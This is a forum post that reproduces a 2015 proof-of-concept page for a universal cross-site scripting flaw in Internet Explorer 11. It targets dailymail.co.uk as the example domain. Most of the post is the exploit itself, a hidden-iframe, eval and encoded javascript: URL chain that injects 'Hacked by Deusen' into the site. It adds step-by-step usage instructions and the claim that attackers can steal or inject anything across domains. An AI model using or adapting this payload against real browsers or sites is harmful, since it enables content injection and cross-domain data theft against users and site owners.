Aerosol Posted February 3, 2015 Report Share Posted February 3, 2015 <title>insider3show</title><body style="font-family:Georgia;"><h1>insider3show</h1><iframe style="display:none;" width=300 height=300 id=i name=i src="1.php"></iframe><br><iframe width=300 height=100 frameBorder=0 src="http://www.dailymail.co.uk/robots.txt"></iframe><br><script>function go(){ w=window.frames[0]; w.setTimeout("alert(eval('x=top.frames[1];r=confirm(\\'Close this window after 3 seconds...\\');x.location=\\'javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwindow.open(%27http%3A%2F%2Fwww.dailymail.co.uk%27%2C%27_blank%27%2C%27top%3D0%2C%20left%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dyes%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22\\';'))",1);}setTimeout("go()",1000);</script><b>Summary</b><br>An Internet Explorer vulnerability is shown here:<br>Content of dailymail.co.uk can be changed by external domain.<br><br><b>How To Use</b><br>1. Close the popup window("confirm" dialog) after three seconds.<br>2. Click "Go".<br>3. After 7 seconds, "Hacked by Deusen" is actively injected into dailymail.co.uk.<br><br><b>Screenshot</b><br><a href="screenshot.png">screenshot.png</a><br><br><b>Technical Details</b><br>Vulnerability: Universal Cross Site Scripting(XSS)<br>Impact: Same Origin Policy(SOP) is completely bypassed<br>Attack: Attackers can steal anything from another domain, and inject anything into another domain<br>Tested: Jan/29/2015 Internet Explorer 11 Windows 7<br><br><h1><a href="http://www.deusen.co.uk/">www.deusen.co.uk</a></h1><script type="text/javascript">//<![CDATA[try{if (!window.CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mirage2:0,oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dok3v=1613a3a185/"},atok:"6e87366c9054a61c3c7f1d71c9cfb464",petok:"0fad4629f14e9e2e51da3427556c8e191894b109-1422897396-1800",zone:"deusen.co.uk",rocket:"0",apps:{}}];CloudFlare.push({"apps":{"ape":"9e0d475915b2fa34aea396c09e17a7eb"}});!function(a,{a=document.createElement("script"),b=document.getElementsByTagName("script")[0],a.async=!0,a.src="//ajax.cloudflare.com/cdn-cgi/nexp/dok3v=919620257c/cloudflare.min.js",b.parentNode.insertBefore(a,}()}}catch(e){};//]]></script>Source Quote Link to comment Share on other sites More sharing options...
